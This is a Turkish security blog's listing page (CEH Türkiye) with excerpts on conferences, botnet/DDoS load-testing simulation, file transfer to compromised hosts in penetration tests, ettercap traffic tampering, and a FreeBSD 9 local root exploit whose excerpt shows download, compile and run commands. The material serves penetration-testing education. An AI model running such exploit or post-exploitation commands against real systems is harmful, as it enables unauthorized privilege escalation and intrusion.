Certified Ethical Hacker

Cypsec’15 Uluslar Arası Siber Güvenlik Konferansı

Bu yıl 15-16-17/04/2015 tarihlerinde  Cypsec Uluslar Arası Siber Güvenlik Konferansı, bir çok değerli teknik uzman ve siber güvenlik sektörünün ürün geliştirici şirketlerinin katılımı ile 3. yılına yeniden Kıbrıs’ta girecek. Geçmiş yıllarda katılma ve sunum yapma fırsatım olmuştu, hem bilgi dolu hem iyi dostlukların ve sektörel bağların kurulduğu değerli bir etkinlik olmuştu bizler için. Bu yıl BGA ve CEHTurkiye ekibi tekrar katılım gösterecek....

DDOS ve Performans Testleri için Botnet Ağlarını Simule Etmek

Bu çalışma, milyonlarca farklı ve gerçek ip adresinden gelen Botnet saldırılarını simüle ederek aktif ağ cihazlarının (Load balancer, Firewall, DDOS koruma sistemleri) performansını ölçmek için gerekli adımları içermektedir. Layer 7 dos/ddos salıdırları için IP spoofing yapılamadığı için lab. ortamında bu işlemler aşağıda anlatıldığı şekilde simule edilecektir. İnternet ortamında sahte bir IP adresinden hedefe herhangi bir TCP paketi (SYN/ACK/FIN vb.) gönderebiliriz,...

7. Uluslararası Bilgi ve Ağ Güvenliği Konferansı – İSKOÇYA

İskoçya’nın Glaskow şehrinde 8-11 Eylül tarihleri arasında gerçekleştirilecek olan 7. Uluslararası Bilgi ve Ağ Güvenliği Konferansına, Süleyman Demirel Üniversitesi Bilgisayar Mühendisliği Bölümü’ nden Doç.Dr. Ecir Uğur Küçüksille ve Araştırma Görevlisi Mehmet Ali Yalçınkaya ve BGA‘dan Ozan Uçar’ın birlikte gerçekleştirdiği “Physical Dangers In The Cyber Security and Precautions To Be Taken“ isimli bildiri çalışması  kabul edilmiş ve çalışmalarının sunumlarını gerçekleştirmek üzere konferansa davet edilmişlerdir...

Pratik Hayattan Fiziksel Güvenlik Riskleri [Sunum]

Bu yıl yine  İstanbul Harbiye’de düzenlenen Siber Güvenlik Konferansın’da “Sızma Testlerinde Fiziksel Güvenlik Riskleri” başlıklı bir sunum ile katıldım. Süre herzamanki gibi kısıtlı olunca, içeriği çok geniş tutamadım. Günümüz risklerini canlandırdığım sunum ilginizi çekebilir, içeriği ve uygulamaları genişletip detayları yine bu siteden paylaşıyor olacağım. http://www.slideshare.net/bgasecurity/szma-testlerinde-fiziksel-gvenlik-riskleri Ozan UÇAR mail@ozanucar.com

Sızma Testlerinde Uzak Sisteme Dosya Aktarma Teknikleri

Sızma testlerinde hedef sistemin komut satırını ele geçirdiğiniz durumlarda hedef sisteme dosya aktarmak ve çalıştırmak için bazı pratik komutlara ihtiyacınız olacaktır. Windows/Linux /*ni vb. sistemlerde hali hazırda kurulu gelen uygulamalar üzerinden aşağıdaki teknikleri kullanarak dosya aktarımı gerçekleştirebilirsiniz. Hedef Makinanın Windows Olduğu Senaryolar PowerShell ile dosya indirmek Powershell Microsoft’un Windows tabanlı işletim sistemlerinde kullanılması için çıkardığı bir komut satırıdır. Bu güne...

Airodump-ng Fixed channel mon0: -1

Kablosuz ağları monitor ederken ve paket gönderirken, kullandığınız kablosuz ağ arabiriminin driver probleminden dolayı Airodump-ng programında aşağıdaki hatayı alabilirsiniz.   Bu durumda uygun driver’ı kurmak güzel bir çözüm, Harun ŞEKER‘in blog girdisinde benzer bir çözüme ulaşabilirsiniz. http://www.harunseker.org/2011/06/ubuntu-aireplay-ng-iwl4965-mon0-channel.html Aynı zamanda, driver kurmadan ilgili programlara –ignore-nagative-one komutunu ekleyerek de sorundan kurtulabilirsiniz (bir önceki çözüme göre daha pratik.) Örneğin; # airodump-ng –channel 1 –bssid...

FreeBSD 9 Yetki Yükseltme Açıklığı

Bu blog girdisi bizim sunucumuzdan (cehturkiye). Root parolamızı çeşitli nedenlerden dolayı unuttuk, bugün lazım oldu ve aşağıdaki detaylarını aktardığımız FreeBSD 9.0-9.1 sürümlerini etkileyen local root exploit ile yetki arttırımına gittik. İlgili exploit; http://www.exploit-db.com/exploits/26368/ Kullanımı $ wget http://www.exploit-db.com/download/26368 -O exp.c $ whoami ozanucar $ gcc -o exp exp.c $ chmod +x exp $ ./exp FreeBSD 9.{0,1} mmap/ptrace exploit by Hunger <fbsd9lul@hunger.hu> #...

HTTP Trafiğinde İçerik Bul Değiştir

Mitm gibi ağ trafiğini araya girerek izlemeye başladığınız durumlarda ettercap aracını kullanarak trafiği değiştirmeniz mümkün olabilir. Tabii benim gibi her lazım olduğunda “bunu nasıl yapıyorduk” diye söylenmiyorsanız..  Bu sefer üşenmiyorum buraya yazıyorum ve bir sonraki lazım oluşunda burada bulmayı umut ediyorum Trafiğini üzerimize aldığımız istemcinin ziyaret ettiği web sayfasında küçük bir değişiklik yapmak istediğimizi varsayalım. Ben sayfaya yeni bir css bağlantısı eklemek istiyorum.. Bunun...

Ankara Üniversitesi Hacktrick’14 Konferansı

Buradan duyuru için geç kalmış olabiliriz fakat tekrar belirtmek istiyoruz, 9-11 Mayıs tarihlerinde gerçekleştirilen BGA’nın da sporsor olduğu Hacktrick’14 konferansında Harun ŞEKER ve Ozan UÇAR olarak bizlerde eğitim ve sunumlar ile katılım sağlayacağız. Cumartesi günü Cehturkiye ekibinden Harun ŞEKER , tüm gün sürecek olan uygulamalı Metasploit Framework Eğitimi gerçekleştirecekdir. Kaçırmamanızı öneririz, katılım ücretsizdir. Detaylı bilgi için konferansın sayfasını ziyaret edebilirsiniz. www.hacktrick14.com...

Cypsec’14 Kıbrıs Güvenlik Konferansı

Bu yıl, Kıbrıs’da ikincisi düzenlenecek olan, Cypsec güvenlik konferansı 24-25 Nisan’da gerçekleştirilecek. Geçen yıla nazaran daha fazla konuşmacı var ve iki gün sürecek bir etkinlik olacak. BGA’dan Ozan UÇAR ve Huzeyfe ÖNAL’da farklı iki sunum gerçekleştireceklerdir. Konferasda bulunucak olan bilişim güvenliği meraklıları ve sektörden kişilerle tanışmayı çok isteriz. Konferansa katılım ücretsizdir, ayrıca detaylı bilgi  için http://www.cypsec.org/ adresini ziyaret edebilirsiniz. Tanıtım videosu: https://www.youtube.com/watch?v=HhXBCYHYgco&feature=youtu.be

CEH Türkiye Hosting Sponsoru